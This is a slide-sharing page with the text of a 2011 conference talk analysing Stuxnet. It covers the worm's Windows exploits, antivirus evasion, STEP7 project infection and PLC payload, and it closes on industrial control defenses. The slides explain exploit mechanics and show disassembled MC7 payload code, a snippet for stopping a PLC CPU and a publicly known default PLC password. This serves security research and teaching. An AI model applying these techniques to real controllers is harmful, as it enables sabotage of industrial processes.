hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attacks - Lessons from Stuxnet

Uploaded on

The talk will show you the techical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the …

The talk will show you the techical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the presentation will explain techniques therein that can be used for industrial espionage and sabotage by copycat attackers against competitor's production facilities. Currently recommended defenses, their shortcomings and alternative approaches will also be discussed.
Bio: Felix 'FX' Lindner is founder and technical lead of the Recurity Labs GmbH consulting and research team. He is also the leader of the Phenoelit group and loves to hack pretty much everything with a CPU and some communication, preferably networked. He looks back at 15+ years of (legal) hacking with only a couple Cisco IOS and SAP remote exploits, tools for hacking HP printers and protocol attacks lining the road.

More in: Technology , Business
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads


Total Views
On Slideshare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. Targeted Industrial Control Process Attacks – Lessons from Stuxnet Felix ‘FX’ Lindner
  • 2. About Founder and technical lead of Recurity Labs GmbH Over 20 years within the computer industry Specialized in attack methodologies and techniques Published first exploits against Cisco IOS and RIM BlackBerry Reverse Engineer by heart
  • 3. Agenda Goals of attacks on ICS Standard attack patterns Technical review of Stuxnet Stuxnet prerequisites Reusable techniques and patterns Current defense strategies Alternative defense strategies
  • 4. Goals of ICS Attacks ICS attacks that where documented:  Demonstration purposes  Power grid  Chemical industry  Rail Road management  Detonating a Trans-Siberian natural gas pipeline (disputed)  Delaying a Uranium enrichment program suspected to be used for nuclear weapons
  • 5. Goals of ICS Attacks
  • 6. Goals of ICS Attacks Commonly suspected goals in the future:  Harming the competition  Delaying production of competing vendor  Primarily aimed at Just-in-Time suppliers  Blackmailing ICS owners  Similar to documented cases of network blackmail, e.g. City of San Francisco vs. Terry Childs  Industrial espionage  Extraction of ICS programming in order to reverse engineer recipes and algorithms
  • 7. Challenges of ICS SecurityTopic Office IT Control SystemsAvailability Planned downtimes 24 x 7 x 365 x foreverAnti-Virus Widely used Uncommon / impossibleLifetime 3-5 years Up to 20 yearsOutsourcing Common Becomes commonSoftware patching Regular, scheduled Slow, vendor specificChange management Common RareReal-time performance Best effort Critical (safety, process)Security awareness Good Poor (only physical)Security testing + audits Regular, scheduled NonePhysical security Difficult Good if local Hard if remoteTime / Log correlation Common Often ignored
  • 9. Internal Attack Patterns Direct manipulation through means of subverted / bribed / disgruntled employees  Removal of control system source codes from site  Configuration of various access restrictions using passwords not communicated Compromise of upstream management systems  Preferred method for people without ICS knowledge  SAP Plant Management and similar homegrown tools with no or very little access controls
  • 10. External Attack Patterns Pre-compromise of production components  Logic bombs or intentional vulnerabilities in components acquired by the victim  Recommending or providing software with “side effects” to suppliers  Especially well-suited for expensive software components  Method occasionally used within the network community
  • 11. External Attack Patterns
  • 12. External Attack Patterns (cont.)1. Compromise workstation computer in office network of target2. Compromise server with control systems connection within target office network3. Establish Man-in-the-Middle point of control between operator and ICS network4. Modify control system
  • 13. The State of the Art in 2005
  • 14. Evolvement of Standard Patterns Most ICS environments used to be equipment vendor specific  In some industries, the production process is completely dependent on the vendors  Solutions are homogeneous inside heterogeneous outside of a particular process The landscape changes rapidly  Component based procurement standardizes the production equipment  Semi-standardized protocols are used to improve interoperability  Wireless protocols get introduced to improve flexibility
  • 16. Features of Stuxnet Multiple spreading mechanisms:  CVE-2010-2568 Windows LNK Vulnerability local code execution  CVE-2010-3888 Windows Task Scheduler local privilege escalation  CVE-2010-2743 Windows Keyboard Layout local privilege escalation  CVE-2010-2729 Windows Print Spooler Service remote code execution  CVE-2008-4250 Windows Server Service RPC handling remote code execution  Self-copying to remote network shares  Self-copying to remote Siemens WinCC servers  Infection of Siemens STEP7 project files for automatic launch upon load
  • 17. Features of Stuxnet (2) Peer-to-peer updating mechanism in LANs Contacting two predefined C&C (command and control) servers Windows rootkit driver covering all Windows versions since 2000  Driver file is signed with valid Code Signing certificate Circumvention and corruption of 10 different client security products  Special treatment for 3 additional ones DLL loading routine that fools behavior based HIDS detection mechanisms
  • 18. Features of Stuxnet (3) Fingerprinting an industrial control process through documented and undocumented data structures in programmable logic controllers (PLCs) Backdoors all instances of Siemens WinCC and STEP7 through patching it’s communication DLL in order to hide its presence on the PLC Virtualizes the PLC on the PLC itself, in order to modify input and output controls without the legitimate code on the PLC knowing
  • 19. CVE-2010-2568: LNK Uses a special feature of .LNK files Explorer needs the icon of the target of the LNK file in order to render it LNK uses “dynamic icons” when pointing to a control panel entry Dynamic icons use an alternative handling where Explorer.exe will call the LoadLibrary API on the destination LoadLibrary causes the DLL’s DllMain function to be executed during load  100% reliable code execution within the context of the user’s Explorer.exe
  • 20. CVE-2010-3888: Task Scheduler Uses CRC32 compensation attack to exploit design flaw in Task Scheduler When creating a scheduled task, the scheduler creates an XML file for it  The XML file contains the user the task is executed under  The XML file is writable to the user creating the task Scheduler runs a CRC32 on it and stores the checksum in the registry  When the execution time arrives, the CRC32 is validated against the file Stuxnet modifies the user context of the scheduled task and performs a CRC32 compensation  100% reliable code execution as LocalSystem on Windows Vista and above
  • 21. CVE-2010-2743: Keyboard Layout Windows XP and lower allows keyboard layouts to be loaded from anywhere A (not validated) index is loaded from the layout file in Kernel mode and used as an index to a function pointer table with 3 entries Exploit scans the memory past the function pointer table for DWORDs that are suitable memory addresses in userland  When one is found (<0x80000000), allocates memory there and triggers the vulnerability  100% reliable code execution as Kernel on Windows XP and below
  • 22. CVE-2010-2729: Print Spooler Enumerates printer spool shares on the network, connects as Guest account Print job requests to print an EXE and MOF file, requesting to print to file in %SYSTEM32% When printing for Guest, spooler does not impersonate the remote user but runs as System, so writing to %SYSTEM32% is allowed MOF files are compiled scripts that are placed below %SYSTEM32%  Windows monitors the creation and executes the MOF file’s instructions, running the EXE file  100% reliable remote code execution as System
  • 23. CVE-2008-4250: Server Service Known vulnerability, found being exploited in the wild by W32/Gimmiv.A  Interesting to note: Gimmiv.A reports installed security products back to the C&C server Exploits a vulnerability in the RPC path canonicalization within the remote service  Patched since 2008 (MS08-067)  Actually turns out to be a sister vulnerability to MS06-040 Gains code execution as System Widely used exploit in the Metasploit Framework, including a large number of target Windows versions and circumvention of DEP on Windows XP and 2003  Fair chance remote code execution as System
  • 24. Special DLL Loading Host IDS behavior monitoring usually looks at LoadLibrary API calls Stuxnet hooks file handling routines in NTDLL.DLL in order redirect them into memory areas when special filenames are encountered When Stuxnet uses LoadLibrary, the special filenames are invalid on the file system, so HIDS will ignore the call
  • 25. Corrupting the WatchersSecurity Software Infected ProcessKAV v1 to v7 LSASS.EXEKAV v8 to v9 KAV ProcessMcAfee Winlogon.exeAntiVir LSASS.EXEBitDefender LSASS.EXEETrust v5 to v6 (fail)ETrust (Other) LSASS.EXEF-Secure LSASS.EXESymantec LSASS.EXEESET NOD32 LSASS.EXETrend PC Cillin Trend Process
  • 26. Siemens STEP7 Project Infection Stuxnet patches the STEP7 project file handling routines to modify any project opened in the development or management IDE  Ignores projects older than 3.5 years  Ignores projects that appear to be examples A specific DLL is placed in the directory “hOmSave7” of the STEP7 project STEP7 specific data in “Apilogtypes” is modified that causes the DLL from “hOmSave7” to be loaded when the project file is opened  The DLL is searched for in %SYSTEM32% and the STEP7 directories first, but when not found is loaded afterwards from the project’s directory
  • 27. Siemens STEP7 Project Infection (2) Similar to STEP7 project infections, Stuxnet also infects MCP files, used by Siemens WinCC  WinCC databases are accessed through a hardcoded username/password combination for an administrative user that cannot be changed  Stuxnet uses remote SQL commands to transfer itself to the server and execute there Project files (even locally) are infected with itself and a cabinet file in “GracScc_tlg7.sav”  Such projects, if loaded into a WinCC server manually, may execute Stuxnet as well
  • 28. Siemens PLC Infection On Windows PCs with Siemens PLC software, the DLL “s7otbxdx.dll” is replaced by a wrapper  The original version is kept for functionality The wrapper ensures that:  When writing to the PLC, the Stuxnet PLC payload is added in transit  When reading from the PLC, the Stuxnet PLC payload is removed and hence hidden from view  An additional thread runs, monitoring the PLC and verifying target properties  A second additional thread controls a Data Block on the PLC, remotely managing its behavior
  • 29. Siemens PLC Infection (2) Before infecting any PLC, the injected code on the Windows PC verifies properties  PLC CPU type 6ES7-417 or 6ES7-315-2  CP 342-5 Profibus interface module is present  At least 33 devices with Profibus identification number 0x7050 or 0x9500 are present  Identification numbers are assigned globally unique by vendors and Profinet International, comparable to IANA  The devices are Variable Frequency Drives (VFDs) from Fararo Paya (Iran), and Vacon (Finland)
  • 30. Stuxnet MC7 Payload Three payloads are delivered with Stuxnet  Two almost identical payloads for 315-2 CPUs  Called Block A and B by Symantec  One larger payload for 417 CPUs  Called Block C by Symantec Replacement of DP_RECV  DP_RECV is responsible for the processing of received Profibus messages on the PLC  Original Function Code is moved and a malicious replacement is embedded Organizational Block (OB) 1 (cyclic execution) is patched with call to Stuxnet MC7 payload OB35 (timed execution) is patched with call to Stuxnet MC7 payload (watchdog function)
  • 31. Binary Comparison of Block A and B
  • 32. Stuxnet MC7 Payload (2) Block A/B implement a state machine 1. Record frames via DP_RECV and monitor values of the VFD, until enough events are recorded 2. Wait 2 hours 3. Send bursts of Profibus frames to the VFDs (Phase I)  145 or 127 frames (Vacon VFDs)  34 or 32 frames (Fararo Paya VFDs) 4. Send bursts (Phase II)  2 or 36 frames (Vacon VFDs)  23 or 27 (Fararo Paya VFDs) 5. Reset internal values and reinitialize internal structures State 0 is the global error handler.
  • 33. Stuxnet MC7 Payload CodeADD_AC: // CODE XREF: S7_LV+94p OPN DB888 L DBW10h // word 888.16 L W#16#3 // word 3 <I // ACCU2 is less than ACCU1 // 3 > 888.16 JC loc_2840 // jump if RLO=1 (DW888.16 < 3) // (do not jump if DW888.16 is 3 or more) TAK // exchange ACCU1 and ACCU2 L W#16#4 // ACCU1 = 4 >I // ACCU2 is greater than ACCU1 // 4 < 888.16 JC loc_2840 // jump if RLO=1 (DW888.16 > 4 ) // (do not jump if DW888.16 is 4 or less) L DW#16#0DEADF007h PUSH // copy ACCU1 into ACCU2 BEloc_2840: // CODE XREF: ADD_AC+Ej // ADD_AC+1Aj L DW#16#0 PUSH // copy ACCU1 into ACCU2 BE
  • 34. Timing of the MC7 Payload Recording takes place for 13 days Wait 2 hours (fixed) Pause after first burst is 27 days Pause after second burst is 27 days  67 days for one cycle of attack  Wearing out was the goal, not destruction  The product of the attacked process was the target, not the production equipment
  • 35. PLC Virtualization / Decoupling PLCs, including Siemens S7, execute in cycles  Read all input signals and set input table  Execute OB1  Write all output Bits to output table and generate signals Stuxnet disables the automatic update of the Process Image Input and Output Table  Essentially decoupling the entire PLC from its sensor array, virtualizing it  Allows the Stuxnet payload to modify input and output Bits (corresponding to signals) so the original code doesn’t notice any changes  No explicit operator spoofing required! This method may even fool people manually debugging the PLC.
  • 36. PLC Input / Output Decoupling L LW0 BLD +7 = L 14h.0 L B#16#0 T LB15h UC SFC1Ah // Update Process Image Input Table JU loc_24 (arg) P# L 15h.0 (arg) P# L 0.0 (arg) P# L 0.0 loc_24: BLD +8 BLD +7 = L 14h.0 L B#16#0 T LB15h UC SFC1Bh // Update Process Image Ouput Table JU loc_46 (arg) P# L 15h.0 (arg) P# L 0.0 (arg) P# L 0.0 loc_46: BLD +8 T LW0
  • 37. BLD: A Trick Not Used STEP7 engineers frequently use a simple trick to hide code The BLD instruction is used as a marker around blocks of code  The instruction has no effect on the PLC, but is interpreted by the Siemens editors. Known combinations are:  BLD 1 / 2 (FC with parameters)  BLD 3 / 4 (FB with parameters)  BLD 7 / 8  BLD 14 / 15 (FC without parameters)  BLD 103 / 104  BLD 130 / 131 / 132 / 133 / 255 The STUXNET code does not make use of this trick  It actually keeps the original BLD instructions, wasting space and simplifying analysis using Siemens tools
  • 38. BLD HidingBLD +7A "Always ON" // When being nasty, use this snippetJC RunUC SFC 46 // Stops the CPURun: NOP 0... your code... CC or UC of your FCsBLD +8 Call SFC46
  • 40. How Much Was Required?Attack Capability Required for Targeted Attack?CVE-2010-2568 LNK NoCVE-2010-3888 Task Scheduler NoCVE-2010-2743 Keyboard Layout NoCVE-2010-2729 Print Spooler NoCVE-2008-4250 Server Service RPC NoSelf-copying to network share NoPeer-to-peer updating NoC&C Servers NoWindows rootkit & certificates No10 AV product circumventions NoBehavioral detection evasion No
  • 41. How Much Was Required?Attack Capability Required for Targeted Attack?Self-copying to WinCC OptionalSTEP7 project file infection YesICS process fingerprinting YesSTEP7 DLL Backdoor OptionalPLC Virtualization Yes
  • 42. Relevant Techniques Most of Stuxnet’s functionality is spreading, survival and persistence oriented  The measures taken are extreme Targeted attacks on an industrial process only need a few key technologies If the infection can be accomplished by human means, only the PLC payload stays relevant  Stuxnet demonstrates how it is done  There is still significant room for advancements, considering the complexity of Siemens S7  Similar attacks are very likely to be possible with any other PLC vendor’s equipment
  • 43. Only In Siemens-Land Dillon Beresford showed another way at BlackHat USA 2011:  Username: basisk  Password: basisk Compromised OS below the MC7 layer is obviously a game over scenario for any security within the PLC network.
  • 45. Current Defenses Siemens still postulates it’s the customer’s job to secure its automation process  Code execution upon STEP7 project loading not considered a vulnerability. No fix.  Code execution through fixed passwords on WinCC servers not fixed. The password is publicly known since 2008.  At least the fixed username and password in PLC OS is supposedly removed since 2009 Air gaps? Don’t help, don’t exist.  Infected consultants and service engineers  Process performance dashboards for management  Agile production environments in supplier fabs Virus scanners?  Have not protected anything since 1970.
  • 46. Future Defenses Frequent reprogramming of the entire automation environment  Proposed by process engineers  May actually be the best option today Langner Controller Integrity Checker (CIC)  Developed as response to Stuxnet  Promising first attempt on solving some of the problems  Evasion obviously possible, as it suffers from the detection paradigm (AV software) problem  Siemens specific, doesn’t help with other automation environments Both don’t help when the underlying OS is infected
  • 47. Future Defenses Future defenses can only get developed with a better understanding of the offense  Stuxnet targets a very specific environment  Currently flourishing research is completely utility centric (power, water, waste, railway) Industrial Control Systems are extremely environment specific by nature The best protection is to evaluate your own environment’s vulnerability  Based on a solid threat model, developed around your business and your likely adversaries  The only approach that has been shown to work in other emerging threat areas before
  • 48. Thank You! Felix ´FX´ Lindner Head fx@recurity-labs.comRecurity Labs GmbH, Berlin, Germany http://www.recurity-labs.com